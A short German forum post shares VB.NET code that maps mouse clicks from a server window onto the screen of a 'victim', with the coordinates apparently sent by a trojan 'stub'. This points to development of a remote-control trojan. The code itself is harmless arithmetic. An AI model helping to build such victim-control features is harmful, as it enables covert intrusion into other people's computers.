Danke BlackBerry,

ich habs jetzt endlich hinbekommen... ich hab mir die Koordinaten vom Opfer über die Stub schicken lassen und es folgender Maßen eingebaut:

Dim XWeite As Integer = e.Location.X.ToString
Dim YHöhe As Integer = e.Location.Y.ToString

Dim ServerHöhe As Integer = PictureBox1.Height 'Server
Dim ServerWeite As Integer = PictureBox1.Width

Dim ClientHöhe As Integer = SystemInformation.VirtualScreen.Height
Dim Clientweite As Integer = SystemInformation.VirtualScreen.Width 'Opfer

Dim ClickX As Integer = (XWeite / ServerWeite) * Clientweite
Dim ClickY As Integer = (YHöhe / ServerHöhe) * ClientHöhe

Danke nochmal für die Hilfe, die ihr mir gegeben habt.